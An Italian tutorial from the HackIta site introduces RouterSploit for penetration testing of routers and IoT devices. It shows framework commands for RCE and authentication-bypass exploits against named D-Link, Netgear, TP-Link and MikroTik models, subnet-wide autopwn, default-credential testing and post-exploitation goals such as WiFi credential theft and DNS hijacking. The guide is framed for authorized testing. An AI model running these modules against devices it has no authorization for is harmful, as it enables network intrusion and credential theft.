tools

RouterSploit: Framework di Exploit per Router e IoT

RouterSploit: Framework di Exploit per Router e IoT

RouterSploit è un framework per testare vulnerabilità su router e dispositivi IoT. Include moduli di scanning, exploit e brute-force.

  • Pubblicato il 2026-02-22
  • Tempo di lettura: 4 min

RouterSploit è un framework di exploitation dedicato a dispositivi embedded come router, access point, NAS e dispositivi IoT. Mentre Metasploit eccelle su sistemi tradizionali, RouterSploit si specializza nel mondo embedded con exploit specifici per firmware vulnerabili di tutti i vendor principali. In questa guida impari a identificare e sfruttare vulnerabilità nei dispositivi di rete.

Perché RouterSploit #

I dispositivi embedded rappresentano spesso l’anello debole delle reti. Router consumer, access point aziendali, telecamere IP e dispositivi IoT raramente ricevono aggiornamenti di sicurezza e spesso mantengono credenziali di default. RouterSploit automatizza il testing di queste vulnerabilità comuni.

Il framework include oltre 130 exploit per vendor come Cisco, D-Link, TP-Link, Netgear, ASUS, MikroTik, Huawei e molti altri, più moduli per testare credenziali di default su decine di protocolli.

Installazione e Setup #

RouterSploit è scritto in Python e si installa facilmente:

bash
git clone https://github.com/threat9/routersploit.git /opt/routersploit
cd /opt/routersploit
pip3 install -r requirements.txt
python3 rsf.py

Su Kali Linux potrebbe essere disponibile nei repository:

bash
sudo apt install routersploit

Al primo avvio vedrai l’interfaccia familiare a chi usa Metasploit:

text
 ______            _            _____       _       _ _   
 | ___ \          | |          /  ___|     | |     (_) |  
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_ 
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_ 
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |                  
     Router Exploitation Framework   |_|                  

rsf >

Struttura dei Moduli #

RouterSploit organizza i moduli in categorie logiche:

exploits/ - Exploit per vulnerabilità specifiche, organizzati per vendor e modello.

creds/ - Moduli per testare credenziali di default su vari protocolli (HTTP, FTP, SSH, Telnet, SNMP).

scanners/ - Scanner per identificare automaticamente vulnerabilità note.

payloads/ - Payload per post-exploitation.

La navigazione segue la stessa logica di Metasploit:

bash
rsf > use exploits/routers/dlink/dir_300_600_rce
rsf (D-Link DIR-300 & DIR-600 RCE) > show options
rsf (D-Link DIR-300 & DIR-600 RCE) > set target 192.168.1.1
rsf (D-Link DIR-300 & DIR-600 RCE) > run

Scanner Autopwn #

Il modulo più potente è l’autopwn scanner che testa automaticamente tutte le vulnerabilità note contro un target:

bash
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 192.168.1.1
rsf (AutoPwn) > run

L’autopwn esegue in sequenza tutti gli exploit e moduli credential per il target, riportando cosa funziona:

text
[*] Running module exploits/routers/dlink/dir_300_600_rce...
[-] Target is not vulnerable
[*] Running module exploits/routers/dlink/dir_645_password_disclosure...
[+] Target IS vulnerable!
[*] Running module creds/routers/dlink/ftp_default_creds...
[+] Credentials found! admin:admin

Per scansionare un’intera subnet:

bash
rsf (AutoPwn) > set target 192.168.1.0/24
rsf (AutoPwn) > run

Test Credenziali di Default #

Uno dei problemi più comuni nei dispositivi embedded sono le credenziali mai cambiate. RouterSploit include moduli specifici per ogni vendor e protocollo.

Test credenziali HTTP:

bash
rsf > use creds/routers/generic/http_default_creds
rsf (HTTP Default Creds) > set target 192.168.1.1
rsf (HTTP Default Creds) > run

Test FTP:

bash
rsf > use creds/generic/ftp_default
rsf (FTP Default) > set target 192.168.1.1
rsf (FTP Default) > run

Test SSH:

bash
rsf > use creds/generic/ssh_default
rsf (SSH Default) > set target 192.168.1.1
rsf (SSH Default) > run

Il database interno contiene le credenziali di default di centinaia di dispositivi, dal classico admin:admin alle combinazioni specifiche per vendor.

Exploit per Vendor Specifici #

RouterSploit ha exploit mirati per vulnerabilità note dei principali produttori.

I router D-Link hanno storicamente molte vulnerabilità. Per RCE su DIR-300/600:

bash
rsf > use exploits/routers/dlink/dir_300_600_rce
rsf > set target 192.168.1.1
rsf > run

Per disclosure password su DIR-645:

bash
rsf > use exploits/routers/dlink/dir_645_password_disclosure
rsf > set target 192.168.1.1
rsf > run

Netgear #

bash
rsf > use exploits/routers/netgear/r7000_r6400_rce
rsf > set target 192.168.1.1
rsf > run
bash
rsf > use exploits/routers/tplink/wdr740nd_wdr740n_backdoor
rsf > set target 192.168.1.1
rsf > run

MikroTik #

I dispositivi MikroTik sono comuni in ambienti enterprise:

bash
rsf > use exploits/routers/mikrotik/winbox_auth_bypass
rsf > set target 192.168.1.1
rsf > run

Workflow di Assessment IoT #

Un assessment completo di dispositivi embedded segue questo flusso:

  1. Discovery - Identifica dispositivi con nmap:
bash
nmap -sV -p 80,443,23,22,21 192.168.1.0/24 --open
  1. Fingerprinting - Identifica vendor e modello dall’interfaccia web o banner
  2. Autopwn - Lancia lo scanner automatico su ogni dispositivo identificato
  3. Credential Testing - Se autopwn non trova vulnerabilità, testa credenziali di default
  4. Manual Exploitation - Per vulnerabilità non coperte da RouterSploit, cerca su Exploit-DB
  5. Post-Exploitation - Una volta dentro, estrai configurazione, credenziali WiFi, e mappa la rete interna

Post-Exploitation su Router #

Una volta ottenuto accesso, i router offrono informazioni preziose:

  • Credenziali WiFi - Spesso in chiaro nella configurazione
  • Client connessi - Mappa dispositivi sulla rete
  • Configurazione VPN - Credenziali per accesso remoto
  • Log - Traffico e attività degli utenti
  • DNS settings - Possibilità di DNS hijacking

Considerazioni su Dispositivi Reali #

I dispositivi embedded sono fragili. A differenza di server tradizionali:

  • Risorse limitate - Troppi thread possono crashare il dispositivo
  • No recovery facile - Un crash potrebbe richiedere reset fisico
  • Produzione - Un router down blocca intere reti

Durante penetration test autorizzati, comunica sempre il rischio al cliente prima di testare dispositivi di rete in produzione.

Aggiornamento Exploit #

RouterSploit è community-driven. Aggiorna regolarmente per avere gli ultimi moduli:

bash
cd /opt/routersploit
git pull

Puoi anche contribuire nuovi exploit seguendo la struttura dei moduli esistenti.

FAQ #

RouterSploit vs Metasploit per IoT?

RouterSploit è specializzato con exploit specifici per embedded. Metasploit ha meno moduli per questo ambito. Usali entrambi.

Funziona su dispositivi aggiornati?

Dipende. Molti dispositivi consumer non vengono mai aggiornati. Enterprise è generalmente più sicuro ma non immune.

Posso aggiungere exploit custom?

Sì, RouterSploit è modulare. Crea moduli Python nella directory appropriata seguendo il template esistente.

È legale testare router?

Solo dispositivi di tua proprietà o con autorizzazione scritta. Per assessment IoT professionali, hackita.it/servizi.


Vuoi supportare HackIta? Visita hackita.it/supporto per donazioni. Per penetration test IoT professionali e formazione 1:1, scopri hackita.it/servizi.

Risorse: RouterSploit GitHub

#iot

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.